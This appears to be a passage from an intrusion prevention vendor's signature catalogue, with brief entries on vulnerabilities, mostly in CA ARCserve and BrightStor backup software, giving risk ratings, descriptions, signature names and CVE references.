https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20679

BYOB-Arbitrary-File-Write-And-Command-Injection

About this vulnerability:

A vulnerability in Build Your Own Botnet

Risk:

High

First detected in:

sgpkg-ips-1808-5242

Last changed:

sgpkg-ips-1808-5242

Platform:

Unix; Linux

Software:

Build Your Own Botnet

Type:

Input Validation

Description:

A vulnerability in BYOB (Build Your Own Botnet), which allows remote attackers to create a new admin user through an unathenticated file write, and achieve command injection through the payload generation page.

Situation:

HTTP_CRL-BYOB-Arbitrary-File-Write-And-Command-Injection

References:

CVE-2024-45257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45257

BZip2-Compressed-File

About this vulnerability:	BZip2 archive
Risk:	Low
First detected in:	sgpkg-ips-186-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	bzip2
Type:	Insecure Configuration
Description:	bzip2 is a widely used compression format file format. These compressed files may be used to import executable content into the target system.
Situation:	HTTP_SS-BZip2-Compressed-File-Download File-Binary_BZip2-Compressed-File-Download

CA-Arcserve-Backup-Authentication-Service-Invalid-Virtual-Function-Call

About this vulnerability:

A vulnerability in CA ARCserve Backup (For Windows)

Risk:

Moderate

First detected in:

sgpkg-ips-490-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup

Type:

Input Validation

Description:

There is an input validation vulnerability in the CA ARCserve Backup authentication service, caauthd.exe. The vulnerability is due to insufficient validation of "opcode 0x7a" Remote Procedure Calls (RPC) sent to CA ARCserve backup. A remote unauthenticated attacker can exploit this vulnerability to inject and execute arbitrary code in the context of the affected service, which is normally SYSTEM.

Situation:

SunRPC_CS-CA-Arcserve-Backup-Authentication-Invalid-Virtual-Function-Call

References:

CVE-2012-2971
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2971

OSVDB-86416
http://www.osvdb.org/86416

CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Buffer-Overflow

About this vulnerability:

A vulnerability in CA ARCserve Backup for Laptops and Desktops

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite; Computer Associates Protection Suite

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the way CA ARCserve Backup for Laptops and Desktops service handles incoming messages.

Situation:

Generic_CS-CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Buffer-Overflow

References:

CVE-2008-3175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3175

BID-30472
http://www.securityfocus.com/bid/30472

CA-ARCserve-Backup-For-Laptops-And-Desktops-Lgserver-Handshake-Buffer-Overflow

About this vulnerability:

A vulnerability in CA ARCserve Backup for Laptops and Desktops

Risk:

High

First detected in:

sgpkg-ips-226-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the way the Computer Associates ARCserve Backup for Laptops and Desktops service handles incoming messages. A remote unauthenticated attacker can send a specially-crafted message to the LGServer service to trigger the vulnerability, and potentially execute arbitrary code on the target host with System privileges.

Situation:

ARCserve_CS-CA-ARCserve-Backup-Lgserver-Handshake-Hex-Mode-Buffer-Overflow

References:

CVE-2008-3175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3175

BID-30472
http://www.securityfocus.com/bid/30472

CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Multiple-Buffer-Overflows

About this vulnerability:

A vulnerability in CA ARCserve Backup for Laptops and Desktops

Risk:

High

First detected in:

sgpkg-ips-278-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Type:

Buffer Overflow

Description:

There exist multiple buffer overflow vulnerabilities in the way CA ARCserve Backup for Laptops and Desktops service handles incoming messages. Specifically the vulnerabilities are due to lack of boundary check when processing several different kinds of user requests. By sending specially crafted requests, an unauthenticated remote attacker can leverage these flaws to execute arbitrary code on the target host with System privileges. In an attack case where code injection is not successful, the affected service will terminate unexpectedly. This will create a denial of service condition of the affected service. In a more sophisticated attack where code injection results in successful process flow diverting, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the running process, normally System.

Situation:

ARCserve_CS-CA-Arcserve-Backup-rxsUseLicenseIni-BOF
ARCserve_CS-CA-Arcserve-Backup-rxsLicGetSiteId-BOF
ARCserve_CS-CA-Arcserve-Backup-rxsGetLogFileNames-BOF
ARCserve_CS-CA-Arcserve-Backup-rxsGetBackupLog-BOF
ARCserve_CS-CA-Arcserve-Backup-Unauthenticated-Access
ARCserve_CS-CA-Arcserve-Backup-rxstBackupComplete-BOF
ARCserve_CS-CA-Arcserve-Backup-rxsSetDataGrowthScheduleAndFilter-BOF
ARCserve_CS-CA-Arcserve-Backup-rxsSetDefaultConfigName-BOF

References:

CVE-2007-3216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3216

BID-24348
http://www.securityfocus.com/bid/24348

OSVDB-35329
http://www.osvdb.org/35329

CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Service-Code-Execution

About this vulnerability:

A vulnerability in CA ARCserve Backup for Laptops and Desktops

Risk:

High

First detected in:

sgpkg-ips-279-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the way CA ARCserve Backup for Laptops and Desktops service handles incoming messages. A remote unauthenticated attacker can send specially crafted commands to the LGServer service to trigger a buffer overflow and execute arbitrary code on the target host with System privileges. In an attack case where code injection is not successful, the affected service will terminate unexpectedly. This will create a denial of service condition of the affected service. In a more sophisticated attack where code injection results in successful process flow diverting, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the running process, normally System.

Situation:

ARCserve_CS-CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Service-BOF
ARCserve_CS-CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Service-BOF-2

References:

CVE-2008-1328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1328

BID-28616
http://www.securityfocus.com/bid/28616

CA-Arcserve-Backup-Lgserver-Handshake-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Computer Associates ARCserve Backup for Laptops and Desktops

Risk:

High

First detected in:

sgpkg-ips-202-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Computer Assoicates ARCserve Backup. A remote unauthenticated attacker can send specially crafted message to the LGServer service to trigger the vulnerability, potentially execute arbitrary code on the target host with System privileges.

Situation:

ARCserve_CS-CA-ARCserve-Backup-Lgserver-Handshake-Integer-Overflow
ARCserve_CS-CA-ARCserve-Backup-Lgserver-Handshake-Buffer-Overflow

References:

CVE-2008-3175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3175

BID-30472
http://www.securityfocus.com/bid/30472

CA-ARCserve-Backup-Message-Engine-RPC-Opcode-59-Denial-Of-Service

About this vulnerability:

A vulnerability in ARCserve Backup

Risk:

Moderate

First detected in:

sgpkg-ips-233-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Type:

Input Validation

Description:

There is a denial of service vulnerability in Computer Associates' ARCserve Backup Message Engine. The vulnerability is due to insufficient data validation. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted message to the target server. A successful attack would create a denial of service condition to the Message Engine service.

Situation:

MSRPC-TCP_CPS-CA-ARCserve-Backup-Message-Engine-RPC-Opcode-59-Denial-Of-Service

References:

CVE-2009-1761
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1761

BID-35396
http://www.securityfocus.com/bid/35396

CA-Arcserve-Backup-NetBackup-Arbitrary-File-Upload

About this vulnerability:

A security bypass vulnerability in Computer Associates ARCserve Backup for Laptops and Desktops

Risk:

High

First detected in:

sgpkg-ips-152-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite

Type:

Malfunction

Description:

There is a security bypass vulnerability in Computer Associates ARCserve Backup for Laptops and Desktops. A remote attacker can send a malicious file upload request to upload arbitrary files to the target host. Depending on the file uploaded, a successful attack may lead to arbitrary code execution with System privileges.

Situation:

ARCserve_CS-CA-ARCserve-Backup-NetBackup-Arbitrary-File-Upload

References:

CVE-2008-1329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1329

BID-28616
http://www.securityfocus.com/bid/28616

OSVDB-44328
http://www.osvdb.org/44328

CA-ARCserve-D2D-Axis2-Default-Credentials

About this vulnerability:

A vulnerability in CA ARCserve D2D

Risk:

High

First detected in:

sgpkg-ips-374-4219

Last changed:

sgpkg-ips-1350-5242

Platform:

Generic

Software:

CA ARCserve D2D

Type:

Malfunction

Description:

There is a vulnerability in CA ARCserve D2D. The vulnerability is due to an authentication weakness in the Apache Axis component of the product. When the software is installed, default credentials are assigned to the Axis2 web services component. A remote attacker can leverage this vulnerability to upload a malicious web service to a target system, enabling arbitrary code execution within the security context of an Axis2 web service, by default SYSTEM.

Situation:

HTTP_CRL-Apache-Axis2-Default-Credentials

References:

BID-45625
http://www.securityfocus.com/bid/45625

CA-ARCserve-D2D-Credential-Disclosure

About this vulnerability:

A CA ARCserve D2D Credential Disclosure vulnerability.

Risk:

High

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CA ARCserve D2D

Type:

Configuration Error

Description:

A vulnerability in CA ARCserve D2D r15 which allows remote attackers to obtain credentials, and execute arbitrary commands via a specially crafted RPC request.

Situation:

HTTP_CS-CA-ARCserve-D2D-Credential-Disclosure

References:

CVE-2011-3011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3011

BID-48897
http://www.securityfocus.com/bid/48897

OSVDB-74162
http://www.osvdb.org/74162

CA-Arcserve-D2D-GWT-RPC-Request-Credentials-Disclosure

About this vulnerability:

A vulnerability in CA ARCserve D2D

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1733-5242

Platform:

Generic

Software:

CA ARCserve D2D

Type:

Malfunction

Description:

A code execution vulnerability exists in CA ARCserve D2D. The vulnerability is due to an information disclosure while processing Google Web Toolkit (GWT) RPC requests. When the software is installed, the administrator credentials are stored in clear text in a file with fixed name. A remote attacker can leverage this vulnerability to download this not properly secured file from a target system, and later log in using the acquired credentials.

Situation:

HTTP_CS-CA-ARCserve-D2D-Credential-Disclosure

References:

BID-48897
http://www.securityfocus.com/bid/48897

OSVDB-74162
http://www.osvdb.org/74162

CA-BrightStor-Arcserve-Backup-Caloggerd-Opcode-79-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in CA ARCserve Backup
Risk:	Moderate
First detected in:	sgpkg-ips-435-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Computer Associates BrightStor ARCserve Backup
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup product. The vulnerability is due to insufficient bounds checking in the user supplied data contained inside the requests sent to the caloggerd service. A remote unauthenticated attacker may leverage this vulnerability to inject and execute arbitrary code on the target host with System level privileges. In an attack case where code injection is not successful the affected service will terminate abnormally. In a more sophisticated attack, where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the service process. On Windows systems, the affected service is running with System privileges, by default configuration.
Situation:	SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Caloggerd-Stack-Buffer-Overflow

CA-BrightStor-Arcserve-Backup-Discovery-Service-Hostname-Buffer-Overflow

About this vulnerability:

Code execution vulnerability in Computer Associates BrightStor ArcServe Backup Discovery Service

Risk:

Moderate

First detected in:

sgpkg-ips-132-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

The Discovery Service of Computer Associates BrightStor ARCserve Backup suffers from a vulnerability where a long hostname in a proprietary protocol can be used to overflow a buffer. The vulnerability can be used by remote attackers to execute arbitrary code with SYSTEM level privileges.

Situation:

Generic_SS-CA-BrightStor-Arcserve-Backup-Discovery-Service-Buffer-Overflow

References:

CVE-2006-5143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143

BID-20365
http://www.securityfocus.com/bid/20365

CA-BrightStor-Arcserve-Backup-Lgserver-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in CA ARCserve Backup for Laptops and Desktops

Risk:

Moderate

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite; Computer Associates Protection Suite 2

Type:

Code Injection

Description:

There is a an arbitrary file upload vulnerability in CA BrightStor ARCServe Backup for Laptops and Desktops. The vulnerability is due to insufficient access control in the LGServer process while handling file uploads from remote users. A remote unauthenticated attacker could exploit this vulnerability to upload a file to a specified location on the target file system. Moreover, the attacker can facilitate other functionalities of the affected server to load and execute the uploaded file with System privileges.

Situation:

ARCserve_CS-CA-BrightStor-ARCserve-Backup-Lgserver-Arbitrary-File-Upload

References:

CVE-2007-5005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5005

BID-24348
http://www.securityfocus.com/bid/24348

CA-BrightStor-Arcserve-Backup-Lgserver-Buffer-Overflow

About this vulnerability:

A vulnerability in Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Risk:

Moderate

First detected in:

sgpkg-ips-94-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup for Laptops and Desktops. The flaw is due to insufficient checks of user-supplied data inside requests sent to the backup server. A remote unauthenticated attacker may leverage this vulnerability to inject and execute arbitrary code on the target host with System level privileges.

Situation:

Generic_CS-CA-BrightStor-Arcserve-Backup-Lgserver-Buffer-Overflow

References:

CVE-2007-0449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449

BID-22340
http://www.securityfocus.com/bid/22340

OSVDB-31593
http://www.osvdb.org/31593

CA-BrightStor-Arcserve-Backup-Lgserver-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Risk:

Moderate

First detected in:

sgpkg-ips-94-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup for Laptops and Desktops. The flaw is due to insufficient checks of user-supplied data inside requests sent to the backup server. A remote unauthenticated attacker may exploit this vulnerability to inject and execute arbitrary code on the target host with System-level privileges.

Situation:

ARCserve_CS-CA-BrightStor-ARCserve-Backup-Lgserver-Stack-Buffer-Overflow

References:

CVE-2007-0449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449

BID-22342
http://www.securityfocus.com/bid/22342

OSVDB-31593
http://www.osvdb.org/31593

CA-BrightStor-Arcserve-Backup-Media-Server-SunRPC-Code-Execution-Vulnerability

About this vulnerability:

Code execution vulnerability in Computer Associates BrightStor ArcServe Backup Media server

Risk:

Moderate

First detected in:

sgpkg-ips-130-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor

Type:

Malfunction

Description:

The Media Server RPC service of Computer Associates BrightStor ARCserver Backup suffers from a vulnerability where a user supplied value is used to reference to a memory address in the server. The vulnerability allows a remote attacker to execute arbitrary code by supplying a memory address that contains data controlled by the attacker. A successful exploit requires no authentication and may lead to code execution with System level privileges.

Situation:

Generic_UDP-CA-BrightStor-Arcserve-Backup-Media-Server-SunRPC-Handle-T
SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Media-Server-SunRPC-Vulnerability

References:

CVE-2007-1785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1785

BID-23209
http://www.securityfocus.com/bid/23209

CA-BrightStor-Arcserve-Backup-Message-Engine-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the CA BrightStor ARCserve Backup Message Engine service

Risk:

High

First detected in:

sgpkg-ips-93-1314

Last changed:

sgpkg-ips-1554-5242

Platform:

Generic

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in the Computer Associates BrightStor ARCserve Backup Message Engine service. By calling the vulnerable RPC method that has opnum 47 with an excessively long string argument, a remote attacker can compromise the vulnerable system.

Situation:

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Message-Engine-Buffer-Overflow

References:

CVE-2007-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0169

BID-22005
http://www.securityfocus.com/bid/22005

OSVDB-31327
http://www.osvdb.org/31327

CA-BrightStor-Arcserve-Backup-Message-Engine-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in Computer Associates ARCserve Backup Message Engine

Risk:

Moderate

First detected in:

sgpkg-ips-227-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Type:

Malfunction

Description:

There is a denial of service vulnerability in the Computer Associates ARCserve Backup Message Engine. An unauthenticated remote attacker can send a crafted RPC message with opcode 0x13 to the affected interface to cause a denial of service condition.

Situation:

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Message-Engine-Denial-Of-Service

References:

CVE-2009-1761
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1761

BID-35396
http://www.securityfocus.com/bid/35396

OSVDB-55226
http://www.osvdb.org/55226

CA-BrightStor-Arcserve-Backup-Message-Engine-Insecure-Method-Exposure

About this vulnerability:

A vulnerability in CA BrightStor Enterprise Backup

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor Enterprise Backup; Computer Associates BrightStor ARCserve Backup; Computer Associates Business Protection Suite; Computer Associates Business Protection Suite for Microsoft SBS; Computer Associates Server Protection Suite

Type:

Malfunction

Description:

There exist unsecured Remote Procedure Call (RPC) methods in the Message Engine service of CA BrightStor Backup product.

Situation:

MSRPC-TCP_CA-BrightStor-Arcserve-Backup-Message-Engine-Insecure-Method-Exposure

References:

CVE-2007-5328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5328

BID-26015
http://www.securityfocus.com/bid/26015

CA-BrightStor-Arcserve-Backup-Message-Engine-Opcode-117-BOF

About this vulnerability:

Buffer overflow vulnerability in the CA BrightStor ARCserve Backup Message Engine service

Risk:

High

First detected in:

sgpkg-ips-93-1314

Last changed:

sgpkg-ips-1554-5242

Platform:

Generic

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in the Computer Associates BrightStor ARCserve Backup Message Engine service. By calling the vulnerable RPC method that has opnum 117 with an excessively long string argument, a remote attacker can compromise the vulnerable system.

Situation:

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Message-Engine-Opcode-117-BOF

References:

CVE-2007-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0169

BID-22005
http://www.securityfocus.com/bid/22005

OSVDB-31327
http://www.osvdb.org/31327

CA-BrightStor-Arcserve-Backup-Portmapper-TADDR2UADDR-DOS

About this vulnerability:

Denial of service vulnerability in Computer Associates BrightStor ARCserve Backup system

Risk:

Moderate

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor

Type:

Malfunction

Description:

There is a denial of service vulnerability in Computer Associates BrightStor ARCserve Backup system due to null pointer dereference error. A crafted Portmap RPC call TADDR2UADDR with a malicious actual length value can be used to terminate the affected service, leading to a denial of service condition.

Situation:

Generic_CA-BrightStor-Arcserve-Backup-Portmapper-TADDR2UADDR-DOS

References:

CVE-2007-0816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0816

BID-22365
http://www.securityfocus.com/bid/22365

OSVDB-32989
http://www.osvdb.org/32989

CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-Call-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Computer Associates BrightStor ARCserve Backup Tape Engine

Risk:

High

First detected in:

sgpkg-ips-114-2032

Last changed:

sgpkg-ips-1554-5242

Platform:

Generic

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Computer Associates BrightStor ARCserve Backup Tape Engine. A crafted RPC message with a malicious JobHandle value allows the compromise of a vulnerable system.

Situation:

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Tape-Engine-Access

References:

CVE-2007-1447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1447

BID-22994
http://www.securityfocus.com/bid/22994

OSVDB-32990
http://www.osvdb.org/32990

CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-GetGroupStatus-BOF

About this vulnerability:

Buffer overflow vulnerability in CA BrightStor ARCserve Backup

Risk:

High

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1554-5242

Platform:

Generic

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

Computer Associates BrightStor ARCserve Backup has a stack buffer overflow vulnerability. By calling the vulnerable GetGroupStatus function with an excessively long group name argument, a remote attacker can cause a denial of service or execute System-level arbitrary code.

Situation:

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-GetGroupStatus-BOF

References:

CVE-2006-6076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6076

BID-21221
http://www.securityfocus.com/bid/21221

OSVDB-30637
http://www.osvdb.org/30637

CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-ReserveGroup-BOF

About this vulnerability:

Buffer overflow vulnerability in CA BrightStor ARCserve Backup

Risk:

High

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1554-5242

Platform:

Generic

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

Computer Associates BrightStor ARCserve Backup has a stack buffer overflow vulnerability. By calling the vulnerable ReserveGroup function with an excessively long group name argument, a remote attacker can compromise the vulnerable system.

Situation:

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-ReserveGroup-BOF

References:

CVE-2006-6076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6076

BID-21221
http://www.securityfocus.com/bid/21221

OSVDB-30637
http://www.osvdb.org/30637

CA-BrightStor-Arcserve-Backup-Universal-Agent-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in CA BrightStor ARCserve/Enterprise Backup

Risk:

High

First detected in:

sgpkg-ips-68-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in CA BrightStor ARCserve/Enterprise Backup. A successful exploitation of this vulnerability may lead to privileged arbitarary code execution.

Situation:

X11_CA-BrightStor-Arcserve-Backup-Universal-Agent-Buffer-Overflow

References:

CVE-2005-1018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1018

BID-13102
http://www.securityfocus.com/bid/13102

OSVDB-15471
http://www.osvdb.org/15471

CA-BrightStor-Arcserve-Backup-Xdr-Parsing-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup

Risk:

High

First detected in:

sgpkg-ips-156-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Business Protection Suite 2; Computer Associates Server Protection Suite 2

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup. By sending a crafted RPC request with an excessively long string parameter, a remote unauthenticated attacker can cause a denial of service or to execute arbitrary code with the privileges of the affected service, normally System.

Situation:

SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Xdr-Parsing-Buffer-Overflow

References:

CVE-2008-2242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2242

BID-29283
http://www.securityfocus.com/bid/29283

OSVDB-45368
http://www.osvdb.org/45368

CA-BrightStor-Arcserve-Lgserver-Authentication-Username-Overflow

About this vulnerability:

A buffer overflow vulnerability in CA BrightStor ARCserve Backup

Risk:

High

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite; Computer Associates Protection Suite

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Computer Associates BrightStor ARCServe Backup. The vulnerability is due to insufficient bounds checking in the LGServer process while performing authentication of users. A remote unauthenticated attacker could exploit this vulnerability by sending an overly large user name to the vulnerable service, and could inject and execute arbitrary code with System privileges.

Situation:

ARCserve_CS-CA-BrightStor-ARCserve-Lgserver-Authentication-Username-Overflow

References:

CVE-2007-5003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5003

BID-24348
http://www.securityfocus.com/bid/24348

CA-BrightStor-Backup-Agent-RPC-Server-Connection-Id-Pointer-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the BrightStor Backup Agent RPC server

Risk:

High

First detected in:

sgpkg-ips-126-2032

Last changed:

sgpkg-ips-1554-5242

Platform:

Windows

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

Computer Associates BrightStor Backup Agent has a buffer overflow vulnerability in the handling of certain MSRPC requests. A specially crafted MSRPC request can be used to overflow a buffer and execute arbitrary code with system privileges.

Situation:

MSRPC-TCP_CPS-CA-BrightStor-Backup-Agent-Connection-Id-Buffer-Overflow

References:

CVE-2007-5329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5329

BID-26015
http://www.securityfocus.com/bid/26015

OSVDB-41372
http://www.osvdb.org/41372

CA-BrightStor-HSM-Buffer-Overflow

About this vulnerability:

A CA BrightStor HSM Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-803-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Computer Associates BrightStor Hierarchical Storage Manager, versions before r11.6, that allows remote attackers to execute arbitrary code via long commands to certain opcodes.

Situation:

Generic_CS-CA-BrightStor-HSM-Buffer-Overflow

References:

CVE-2007-5082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5082

BID-25823
http://www.securityfocus.com/bid/25823

OSVDB-41363
http://www.osvdb.org/41363

CA-Erwin-Web-Portal-Configserviceprovider-Information-Disclosure

About this vulnerability:

A vulnerability in CA Erwin Web Portal

Risk:

Moderate

First detected in:

sgpkg-ips-583-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

CA Erwin Web Portal

Type:

Directory Traversal

Description:

An information disclosure vulnerability exists in CA ERwin Web Portal. This vulnerability is due to lack of authentication and insufficient input validation in the ConfigServiceProvider servlet when processing HTTP requests. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary XML files on a target system, including XML files which store database credentials.

Situation:

HTTP_CS-CA-Erwin-Web-Portal-Configserviceprovider-Information-Disclosure

References:

CVE-2014-2210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2210

BID-66644
http://www.securityfocus.com/bid/66644

OSVDB-106135
http://www.osvdb.org/106135

CA-Erwin-Web-Portal-Configserviceprovider-Remote-File-Creation

About this vulnerability:

A vulnerability in CA Erwin Web Portal

Risk:

High

First detected in:

sgpkg-ips-588-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

CA Erwin Web Portal

Type:

Directory Traversal

Description:

A remote file creation/overwrite vulnerability exists in CA ERwin Web Portal. This vulnerability is due to lack of authentication and insufficient input validation in the ConfigServiceProvider servlet when processing HTTP requests. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to create/overwrite arbitrary XML files on a target system.

Situation:

HTTP_CS-CA-Erwin-Web-Portal-Configserviceprovider-Remote-File-Creation

References:

CVE-2014-2210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2210

BID-66644
http://www.securityfocus.com/bid/66644

OSVDB-105359
http://www.osvdb.org/105359

CA-Erwin-Web-Portal-Fileaccessserviceprovider-Denial-Of-Service

About this vulnerability:

A vulnerability in CA Erwin Web Portal

Risk:

Moderate

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CA Erwin Web Portal

Type:

Directory Traversal

Description:

